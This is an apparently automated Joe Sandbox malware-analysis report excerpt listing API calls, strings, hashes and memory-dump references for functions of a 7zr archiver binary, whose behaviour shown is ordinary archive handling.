                             • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: FreeVirtual
                            • String ID:
                            • API String ID: 1263568516-0
                            • Opcode ID: 68dcadf0f2d5bdb0acb1a39086e22bc06b6426284160dc45a3f1ee5441be171e
                            • Instruction ID: ed4542046a9417b439573f322b18cb31060a8ddbd5496351bd0107140d6a10e2
                            • Opcode Fuzzy Hash: 68dcadf0f2d5bdb0acb1a39086e22bc06b6426284160dc45a3f1ee5441be171e
                            • Instruction Fuzzy Hash: 92A00278780700B7ED6167307D4FF5937247784F45F30C5487345690D06AE87084DA9C
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: free
                            • String ID:
                            • API String ID: 1294909896-0
                            • Opcode ID: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                            • Instruction ID: cdfcf48611c8f55222de31428320655435190ecbac1e8e036c6a1139737afd81
                            • Opcode Fuzzy Hash: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                            • Instruction Fuzzy Hash:
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: free
                            • String ID:
                            • API String ID: 1294909896-0
                            • Opcode ID: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                            • Instruction ID: 2499f238b076b68bcefbd1f1cc78978792454891ee544a834b2b61ca994af457
                            • Opcode Fuzzy Hash: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                            • Instruction Fuzzy Hash:
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: free
                            • String ID:
                            • API String ID: 1294909896-0
                            • Opcode ID: 41781109e2e43ce1202a3d4c5f39ea06656657e3f3a59fabc9cd3236bd26250f
                            • Instruction ID: b9ce8a67dd30aeebed0283b65dd125eb32626c287492e507b4e4fc50b633b36b
                            • Opcode Fuzzy Hash: 41781109e2e43ce1202a3d4c5f39ea06656657e3f3a59fabc9cd3236bd26250f
                            • Instruction Fuzzy Hash: E7A002B1406105DBDA061B10ED094897B65EB89667B61846DF15B608718B3548A0BB05
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: Version
                            • String ID:
                            • API String ID: 1889659487-0
                            • Opcode ID: 2a928df7e633a69c682b0d111d5ad49c616fddef8450d04414c1c53123f368a6
                            • Instruction ID: d50b45457032dc8400273ee9ef8f133ca93d11dfb11d8d2fe806165edd999769
                            • Opcode Fuzzy Hash: 2a928df7e633a69c682b0d111d5ad49c616fddef8450d04414c1c53123f368a6
                            • Instruction Fuzzy Hash: 8DD05B72911505C7DF00772CCC0A39A7761F761380FC88958D86DC5153F97DC695C2D2
                            APIs
                            • memcmp.MSVCRT(?,007848A0,00000010), ref: 006DC09E
                            • memcmp.MSVCRT(?,00780258,00000010), ref: 006DC0BB
                            • memcmp.MSVCRT(?,00780348,00000010), ref: 006DC0CE
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: memcmp
                            • String ID:
                            • API String ID: 1475443563-0
                            • Opcode ID: a777e3ce12e6e958f98f9c0b11def254bfca6ca712027d885b263c3b967e142e
                            • Instruction ID: 08384bac0d59ed845e4c72ad0f5b3fd81724f16dbfe582c9dc5d77d83f57b29e
                            • Opcode Fuzzy Hash: a777e3ce12e6e958f98f9c0b11def254bfca6ca712027d885b263c3b967e142e
                            • Instruction Fuzzy Hash: 10916471A40719EBD7609B21DC45FAB73A9AF65760F00802AFD4AD7341FB24EE05C7A0
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                             • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: $16-bit overflow for number of files in headers$32-bit overflow in headers$Central$Local$Minor_Extra_ERROR$Missing volume : $Unsorted_CD$Zip64$apk
                            • API String ID: 3519838083-1909666238
                            • Opcode ID: abce41c2c65a7cc35955e04e51fe2609c120cda2458951097ef5d6b52dfc2521
                            • Instruction ID: 02132dcf05dc062ab77fe0ea1f2150f2d296a7e4acaf794628641318bbf9edd0
                            • Opcode Fuzzy Hash: abce41c2c65a7cc35955e04e51fe2609c120cda2458951097ef5d6b52dfc2521
                            • Instruction Fuzzy Hash: BEC1AF71D0428AEFEB1DDF64C855AFD7BB1AB11300F1980A9E0496B263D739BE45DB40
                            APIs
                            • __EH_prolog.LIBCMT ref: 006D64F8
                            • GetCurrentThreadId.KERNEL32 ref: 006D6508
                            • GetTickCount.KERNEL32 ref: 006D6513
                            • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 006D651E
                            • GetTickCount.KERNEL32 ref: 006D6578
                            • SetLastError.KERNEL32(000000B7,?,?,?,?,00000000), ref: 006D65C5
                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 006D65EC
                              • Part of subcall function 006D5D7A: __EH_prolog.LIBCMT ref: 006D5D7F
                              • Part of subcall function 006D5D7A: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000001,?,?,00000000), ref: 006D5DA1
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: CountCurrentErrorH_prologLastTick$CreateDirectoryProcessThreadfree
                            • String ID: .tmp$d
                            • API String ID: 1989517917-2797371523
                            • Opcode ID: c4d1ba0013507d75e3ff298a4be9d0d184a4a2934ed2a1746747c8f49d32b71f
                            • Instruction ID: a60051503b7fdb916b1706d88d2f0dd1baf261aab620832d46b82fdba147fe53
                            • Opcode Fuzzy Hash: c4d1ba0013507d75e3ff298a4be9d0d184a4a2934ed2a1746747c8f49d32b71f
                            • Instruction Fuzzy Hash: A941FF72D10124DBCF16ABA0E8557EC77B2BF59354F14412FF806AA3A2CB388984CB55
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prologfputs
                            • String ID: Cannot open the file$The archive is open with offset$The file is open$WARNING:
                            • API String ID: 1798449854-1259944392
                            • Opcode ID: 7d474e802e58947d97aa4a889707df5034db88a67d7f0a297740ab193697fdff
                            • Instruction ID: b6b16eab03d836d3b9e7d83a051eded126e6b3d7b490094dcea7db61d2a05f38
                            • Opcode Fuzzy Hash: 7d474e802e58947d97aa4a889707df5034db88a67d7f0a297740ab193697fdff
                            • Instruction Fuzzy Hash: 71217171E00505DFCB15EBA4C952AAEB3E5FF58350B00413EE506D7791CB78AD12CB84
                            APIs
                            • __EH_prolog.LIBCMT ref: 006DA091
                              • Part of subcall function 006D9BAA: RegCloseKey.ADVAPI32(?,?,006D9BA0), ref: 006D9BB6
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: CloseH_prolog
                            • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$Previous Update Revision$Update Revision$x86
                            • API String ID: 1579395594-270022386
                            • Opcode ID: d3aa43de79c71986e12ba25994add8e502ff3105d3c1c98d03228b2749ab1fd0
                            • Instruction ID: 8ab196ad15b41e6ce9d3068d796291a4d094e66c5e78f1cc28921954452e2aa5
                            • Opcode Fuzzy Hash: d3aa43de79c71986e12ba25994add8e502ff3105d3c1c98d03228b2749ab1fd0
                            • Instruction Fuzzy Hash: 38519E71E00205DFCF15EFA8C8929EEB7B6BF59340F00842EE516A7381DB749A05CB91
                            APIs
                            • __EH_prolog.LIBCMT ref: 0072C453
                              • Part of subcall function 0072C1DF: __EH_prolog.LIBCMT ref: 0072C1E4
                              • Part of subcall function 0072C543: __EH_prolog.LIBCMT ref: 0072C548
                              • Part of subcall function 006D1E0C: malloc.MSVCRT ref: 006D1E1F
                              • Part of subcall function 006D1E0C: _CxxThrowException.MSVCRT(?,00784B28), ref: 006D1E39
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ExceptionThrowmalloc
                            • String ID: ((x$<(x$L(x$\(x
                            • API String ID: 3744649731-895272097
                            • Opcode ID: 74b4e88d117cfbafd283cce8aea320d80e9abf1cf5be7bcf38886448e85a738e
                            • Instruction ID: c33b7a406f7f53fb0c1eaff7ce10c12eb956418d48f017c21c67259c1fcf54db
                            • Opcode Fuzzy Hash: 74b4e88d117cfbafd283cce8aea320d80e9abf1cf5be7bcf38886448e85a738e
                            • Instruction Fuzzy Hash: A2218DB0900B44CECB24EF6AD44965BFBF4FF54304F10896ED49A97751DBB8AA08CB54
                            APIs
                            • __EH_prolog.LIBCMT ref: 0070602A
                            • EnterCriticalSection.KERNEL32(00792938), ref: 00706044
                            • LeaveCriticalSection.KERNEL32(00792938), ref: 00706060
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterH_prologLeave
                            • String ID: v$8)y
                            • API String ID: 367238759-625179386
                            • Opcode ID: a59ca210b6934004550b3a599f98dba21b5b360d50832772b2b6337076758f44
                            • Instruction ID: 285de8e40422aa4e25777901d646abe2e6e874b715eb5dbd9fc9c38508c5f6f0
                            • Opcode Fuzzy Hash: a59ca210b6934004550b3a599f98dba21b5b360d50832772b2b6337076758f44
                            • Instruction Fuzzy Hash: 48F03A76900114EFCB05DF98D909EDEBBB8FF493A0F14816AF409A7211C7B99A00CBA4
                            APIs
                            • memset.MSVCRT ref: 007303F5
                            • memcpy.MSVCRT(?,?,00000008,00000064,?,?,?,?,00000064), ref: 00730490
                            • memset.MSVCRT ref: 00730618
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: memset$memcpy
                            • String ID: $@
                            • API String ID: 368790112-1077428164
                            • Opcode ID: b087934bbc7c95f7ee7647cfdf8c5fba5a54d9d4edf4d7707c4dc34027eb37c2
                            • Instruction ID: 1b242f30b191c65369fa789d7fe226683e87fbaa22320884351225575c2863c8
                            • Opcode Fuzzy Hash: b087934bbc7c95f7ee7647cfdf8c5fba5a54d9d4edf4d7707c4dc34027eb37c2
                            • Instruction Fuzzy Hash: 4A91BD31900709EFEF20DF24C866BDAB7B1AF50304F048469E59A56593D778BAA9CFD0
                            APIs
                            • __EH_prolog.LIBCMT ref: 006D6141
                              • Part of subcall function 006D6C72: __EH_prolog.LIBCMT ref: 006D6C77
                            • SetLastError.KERNEL32(0000010B,00000000,00000000), ref: 006D6197
                            • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 006D626E
                            • SetLastError.KERNEL32(?,?,?,?,?,0000005C,?,00000000,00000000), ref: 006D62A9
                              • Part of subcall function 006D6096: __EH_prolog.LIBCMT ref: 006D609B
                              • Part of subcall function 006D6096: DeleteFileW.KERNEL32(?,?,?,00000000), ref: 006D60DF
                            • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 006D6285
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorLast$H_prolog$DeleteFile
                            • String ID:
                            • API String ID: 3586524497-0
                            • Opcode ID: 2399f3d6fe2270094cf88cee1607f3ca28be5bd77aa1f78276f6996df4357fb4
                            • Instruction ID: 378641ceb2d14b2bfa91898caa85ac08cd34abcb2d17c690bfa1ce19d5a298e3
                            • Opcode Fuzzy Hash: 2399f3d6fe2270094cf88cee1607f3ca28be5bd77aa1f78276f6996df4357fb4
                            • Instruction Fuzzy Hash: FF51A931C04218AADF15EBE8D852BEDBB76AF15350F10416FF84277392CB746A0ACB55
                            APIs
                            • memcmp.MSVCRT(?,007848A0,00000010), ref: 006E44DB
                            • memcmp.MSVCRT(?,00780128,00000010), ref: 006E44EE
                            • memcmp.MSVCRT(?,00780228,00000010), ref: 006E450B
                            • memcmp.MSVCRT(?,00780248,00000010), ref: 006E4528
                            • memcmp.MSVCRT(?,007801C8,00000010), ref: 006E4545
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: memcmp
                            • String ID:
                            • API String ID: 1475443563-0
                            • Opcode ID: b14299aee2bb96d7aba0b7012b3978c514c85335522ff62939e71d53d6f6a7ef
                            • Instruction ID: 101da6691b00b20927905c73842e21230b58ef9f19a9aa9a2e9425fd543f5ec0
                            • Opcode Fuzzy Hash: b14299aee2bb96d7aba0b7012b3978c514c85335522ff62939e71d53d6f6a7ef
                            • Instruction Fuzzy Hash: C82195B2B41308ABE7049E31DC85FBE33ADAB947A4F048135FD069B245FA68DD0587A0
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: !$LZMA2:$LZMA:
                            • API String ID: 3519838083-3332058968
                            • Opcode ID: 4e167cb021de91875a799070a4e70a729b584d83ab6563f0b4cef2dad549f494
                            • Instruction ID: 009cd57c630340e3dd7859c9e1d2f42a8f23b2fa34f921c69e1eb7203579e541
                            • Opcode Fuzzy Hash: 4e167cb021de91875a799070a4e70a729b584d83ab6563f0b4cef2dad549f494
                            • Instruction Fuzzy Hash: B061C17098414ADEDB16CBACC55AFFD7BB2AF15344F2440A9E406671E2D778AEC0C750
                            APIs
                            • __EH_prolog.LIBCMT ref: 006DA389
                              • Part of subcall function 006DA4C5: GetModuleHandleW.KERNEL32(ntdll.dll,?,006DA3C1,00000001), ref: 006DA4CD
                              • Part of subcall function 006DA4C5: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 006DA4DD
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: AddressH_prologHandleModuleProc
                            • String ID: : $ SP:$Windows
                            • API String ID: 786088110-3655538264
                            • Opcode ID: c07cb2a343b9a0f495d70d1e1c46bfa3a6f5a1559935550a5abed2fad3f16941
                            • Instruction ID: f688f058ddd8ce17e8fa6da087f1fd78e99cf945266e44dbe92aae2bb6429809
                            • Opcode Fuzzy Hash: c07cb2a343b9a0f495d70d1e1c46bfa3a6f5a1559935550a5abed2fad3f16941
                            • Instruction Fuzzy Hash: E3316F71C0010A9ACF65EBE1C8729EEBBB2BF28300F40406FE50672391DF715A89DA94
                            APIs
                            • GetModuleHandleW.KERNEL32(ntdll.dll,?,006DA3C1,00000001), ref: 006DA4CD
                            • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 006DA4DD
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: RtlGetVersion$ntdll.dll
                            • API String ID: 1646373207-1489217083
                            • Opcode ID: a8f709d605822e3953b1a129d5d5e4c83577dec5866aa2993cb89b85a95c8413
                            • Instruction ID: 2d0a45f597b777edaa91c9de6630ee4ac7e8d0c629c7b1fc66931656df1585fc
                            • Opcode Fuzzy Hash: a8f709d605822e3953b1a129d5d5e4c83577dec5866aa2993cb89b85a95c8413
                            • Instruction Fuzzy Hash: 5ED0C7B17582111BBA71A6F47C0EFE6168D8B45BD1715C86BF804D1140FADD9EC242A6
                            APIs
                            • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,00000000,?), ref: 006F0359
                            • GetLastError.KERNEL32(?,?,00000000,?), ref: 006F0382
                            • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,?,00000000,?), ref: 006F03DA
                            • GetLastError.KERNEL32(?,?,00000000,?,?,?,00000000,?), ref: 006F03F0
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorFileLastSecurity
                            • String ID:
                            • API String ID: 555121230-0
                            • Opcode ID: 74eabfaa8113225d0d1d9db60b187487bbb4b968cef2bc4357097636033a3e1c
                            • Instruction ID: 132cc8dee15739e0a4a118be8065a5b70a3d4c09b729ce53c48ff3d7e0f3d781
                            • Opcode Fuzzy Hash: 74eabfaa8113225d0d1d9db60b187487bbb4b968cef2bc4357097636033a3e1c
                            • Instruction Fuzzy Hash: 97314B7590020AEFEB11DFA4C880BEEBBB6FF44344F108959E56697352D770AE41DBA0
                            APIs
                            • __EH_prolog.LIBCMT ref: 006D8300
                            • GetFileInformationByHandle.KERNEL32(000000FF,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 006D834F
                            • DeviceIoControl.KERNEL32(000000FF,000900A8,00000000,00000000,00000000,00004000,?,00000000), ref: 006D837C
                            • memcpy.MSVCRT(?,?,?,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 006D839B
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ControlDeviceFileH_prologHandleInformationfreememcpy
                            • String ID:
                            • API String ID: 1689166341-0
                            • Opcode ID: 9c6f0fcf02891d7dd81a7a9c7fddeef4cafcc90fc36eafadb3d12f1493802930
                            • Instruction ID: 712f9988342c60c6a01f8389db066776db234e2ac7d55f7b0a9c556712880fb9
                            • Opcode Fuzzy Hash: 9c6f0fcf02891d7dd81a7a9c7fddeef4cafcc90fc36eafadb3d12f1493802930
                            • Instruction Fuzzy Hash: 7E2174B2900204AFDF119F94DC85EEE7BBAEB59750F10402EF94967351CA758E44C664
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: BlockPackSize$BlockUnpackSize
                            • API String ID: 3519838083-5494122
